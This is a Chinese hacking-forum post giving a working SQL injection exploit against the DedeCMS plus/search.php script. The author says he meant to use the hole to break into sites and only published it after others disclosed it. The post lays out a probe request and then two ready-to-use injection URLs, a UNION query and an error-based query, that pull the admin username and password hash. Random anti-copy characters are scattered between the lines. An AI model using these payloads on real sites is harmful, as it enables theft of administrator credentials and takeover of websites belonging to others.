中国网络渗透测试联盟
标题:
[通杀]dedecms plus/search.php 注入漏洞利用EXP
[打印本页]
作者:
admin
时间:
2013-1-21 08:45
标题:
[通杀]dedecms plus/search.php 注入漏洞利用EXP
转载不加作者名的没JJ
8 \5 X! W! c0 Z
' ^- Z# B; T0 F
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
+ {9 |+ i! R; y8 g7 o0 h
6 X4 b, S5 V0 C- k. a
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
% o; O- T: `6 @* O
/ I9 v6 j8 G& {
我一般是这样测试的:
$ e3 F( E* d3 N( _
1 h2 a% J/ y8 G |" e
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
2 d/ _8 e& O0 L6 G" r
) T1 V l7 K/ A" Y
转载不加作者名的没JJ
8 c, N9 q! V5 i* p- D5 [! ~$ K
, F f& B7 E% ]
作者:鬼哥
5 `, c* Q) `9 G" s4 a
' c- p l! u& V) Q% `
3 j$ o+ Z9 I$ E. `
9 ?4 k1 h$ Y/ I3 D
看结果如果提示
& s3 q- o- I5 P$ C, S- o% A
7 H& n7 X" \0 ?% y. p" j- e
Safe Alert: Request Error step 2 !
7 |. j* }9 X$ ^# B a, |
" @. _4 a- X a8 N, F
那么直接用下面的exp
- V: z( I6 j, L4 j/ {) L
- d) @$ I" X. Z/ A
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
$ c6 P; F1 Y4 ], q. J& G% E
" k3 c2 e+ A) u/ y
v' }, T% j* H9 b: e
看结果如果提示
! E. W' ]0 W! P n# @
# a E/ t! @, z3 l' u: o& L8 D
Safe Alert: Request Error step 1 !
3 ]$ \2 a; i8 j1 ?6 _; q
_* g- P, x: d. ~' j
那么直接用下面的exp
9 A" b- m& A4 e! H4 D9 O* v$ K
" I$ {2 W7 ]) Q* A# z
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
# j, Q+ T5 H* _) e) K
, N1 P" f( C* e1 |- ~1 v
' F2 J3 H2 }) w8 z+ ?" T
如果正常显示证明漏洞不存在了。
& ?- Y3 Z6 W# P+ y1 u' a
& T1 l! D4 @7 Q- P% Z( W" H
转载不加作者名的没JJ
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2